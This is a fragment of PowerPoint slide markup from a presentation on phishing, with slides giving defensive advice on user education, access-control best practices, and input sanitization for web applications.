            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B103386D-0685-440D-B2A3-407F70163E01}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2970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2971800"/>
            <a:ext cx="3657600" cy="323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90308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48A6E251-D153-43CD-80F7-CAF684B55481}"/>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Phishing Trends</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31747" name="Picture 7"/>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527425" y="3475038"/>
            <a:ext cx="2089150" cy="1052512"/>
          </a:xfr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9B565B4E-95B8-4970-A672-4E27084E13BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A6601E2B-9F42-47CE-92F1-A81A90F93E5A}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38324905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13E3C1A1-4DB1-43A9-BD05-DE35F3A1760A}"/>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Monotype Corsiva" panose="03010101010201010101" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Phishing Trends</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33795"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28650" y="2212975"/>
            <a:ext cx="7886700" cy="3576638"/>
          </a:xfrm>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{566F3538-BD1F-4340-8814-574A4BDCD932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{301EFF1C-4262-4717-9896-6FC32305EF39}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34821" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE3B6C67-F6C3-45CC-9887-8E932A7039A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3032125" y="48371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endParaRPr lang="en-US" altLang="en-US">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="C0C0C0"/>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32794787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7763D0F2-5BB3-4C32-997A-B3E7459FDF86}"/>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35843" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto"/>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Educate application users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Think before you open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Never click on the links in an email , message boards or mailing lists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Never submit credentials on forms embedded in emails</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Inspect the address bar and SSL certificate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Never open suspicious emails</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ensure that the web browser has the latest security patch applied</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Install latest anti-virus packages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Destroy any hard copy of sensitive information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Verify the accounts and transactions regularly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Report the scam via phone or email.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" b="1" i="1" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" b="1" i="1" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1639483-B3B9-407A-8488-0CCFEC8D6332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F8AD0E78-0D94-448A-9EA7-3A7E56AFDE1E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235407906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0B62CE46-AF27-43CA-8B4C-AF0C4F1A5901}"/>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37891" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1447800"/>
            <a:ext cx="7924800" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Formulate and enforce Best practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" b="1" i="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>
              </a:solidFill>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Authorization controls and access privileges for systems, databases and applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Access to any information should be based on need-to-know principle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Segregation of duties.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Media should be disposed only after erasing sensitive information.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FDCB384-323F-4DAE-92A8-47B1198CD34E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5E74DB28-BFA4-49D6-B485-5B945F5DCA3C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40045393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44BBA0FC-F5A2-4746-B44A-11F3E537341D}"/>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51203" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A3FB995-8C69-40F8-A3C3-BF1A68F59201}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Reinforce application development / maintenance processes: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>		1.  Web page personalization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1752600" lvl="3" indent="-381000" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1350">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Using two pages to authenticate the users. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1752600" lvl="3" indent="-381000" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1350">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Using Client-side persistent cookies.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1350"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74798E09-D338-4960-B16E-FC8A25AC8C25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B683C0F9-69E3-4FCA-A76B-4CE2234409CA}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2409088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5995FE84-E45D-42A4-9E9F-F14E08F196FC}"/>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41987"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Font typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	2.  Content Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" b="1" i="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>
              </a:solidFill>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Never inherently trust the submitted data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Never present the submitted data back to an application user without sanitizing the same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Always sanitize data before processing or storing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Check the HTTP referrer header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"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AE22D175-47E5-488B-BB6E-B95C67862A45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{15E6E508-61BD-49DD-A195-503B683AD5B0}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
